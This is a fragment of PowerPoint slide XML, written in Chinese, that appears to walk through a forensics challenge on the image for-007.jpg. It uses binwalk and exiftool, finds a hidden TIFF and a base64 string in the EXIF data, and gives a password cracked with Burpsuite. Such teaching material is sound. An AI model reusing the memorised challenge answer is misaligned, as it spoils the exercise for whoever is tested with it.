      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="内容占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F39D60D7-CF1E-4746-8C2A-3E709C89FEA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect l="308" t="58310" r="23253" b="391"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="435930" y="2961835"/>
            <a:ext cx="4869717" cy="1099802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F327AFBB-C37E-40C8-BB0F-554D607ADD14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349278" y="3914591"/>
            <a:ext cx="4956369" cy="1683089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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发现这张图片隐藏有另一张</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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TIFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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的图片，</a:t>
            </a:r>
            <a:r>
              <a:rPr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从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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30</a:t>
            </a:r>
            <a:r>
              <a:rPr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块偏移开始就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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TIFF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">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rPr>
              <a:t>文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B87A2423-5729-4A71-8AF3-6A5F70D5DF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 r="214" b="41377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6770676" y="3506706"/>
            <a:ext cx="4659644" cy="248652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0579C7CF-562C-4589-B50F-74EA0C522D81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460254" y="1927650"/>
            <a:ext cx="6310422" cy="577081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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rPr>
              <a:t>  for-007.jpg </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接连接符 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{367F6EF2-811F-4DE0-A9B6-0AD4F10D54EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5884973" y="924560"/>
            <a:ext cx="0" cy="5466715"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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992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解析图片内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接连接符 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{852B54E6-8D30-477C-87FD-73854A71179A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289550" y="978535"/>
            <a:ext cx="0" cy="5466715"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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CE99E8F-B2B6-4A73-8048-322E541E499B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738370" y="1172210"/>
            <a:ext cx="4939665" cy="2780665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA911C4B-7F71-4C11-9F4C-E0640D6689CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608320" y="1288415"/>
            <a:ext cx="5910580" cy="5196840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36388674-DE1A-487E-86F9-49E20D84F977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608955" y="1288415"/>
            <a:ext cx="5909945" cy="998855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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exiftool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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图虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA7619B2-7C6D-4E54-8309-AC79E431EAEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5859144" y="2430145"/>
            <a:ext cx="5379469" cy="258445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latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exif</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可交换图像文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常被简称为Exif（Exchangeable</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> image file format）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Exif</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以被附加在</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> JPEG、TIFF、RIFF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等文件之中，为其增加有关数码相机拍摄信息的内容和缩略图或图像处理软件的一些版本信息</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exiftool则是用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析exif格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内容。用于读写和处理图像（主要</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>音视频和PDF等文件的元数据（metadata</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E553F5D0-9976-4B17-B971-3AE3885478FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410039" y="4403841"/>
            <a:ext cx="4599837" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从可疑的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>锁定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Image Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对应字符串（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）eFdpbnRlcjE5OTV4IQ==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用Burpsuite破解获得密码：xWinter1995x!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E9C19C-C06D-4632-A44F-9FAD54D0381A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:srcRect b="58096"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="498888" y="2000187"/>
            <a:ext cx="4422140" cy="2211705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6CE5C0-6667-42AA-AA36-507A4EE8ACCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514986" y="1500759"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exiftool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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rPr>
              <a:t> for-007.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67A5ED3-6F8C-40D1-BF2E-D5A8A8FCAAC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5756275" y="4706620"/>
            <a:ext cx="5615940" cy="1586230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3587736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解析图片内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接连接符 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{852B54E6-8D30-477C-87FD-73854A71179A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289550" y="978535"/>
            <a:ext cx="0" cy="5466715"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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86D2373-ED08-452E-A89C-30CFD2ABC8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289550" y="978535"/>
            <a:ext cx="0" cy="5466715"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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259D228-23DE-47F6-AF15-2F438C42FA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738370" y="1172210"/>
            <a:ext cx="4939665" cy="2780665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FDC80D6-2A80-40C5-A1F5-82E4E3290185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608320" y="1288415"/>
            <a:ext cx="5910580" cy="5196840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="7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latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
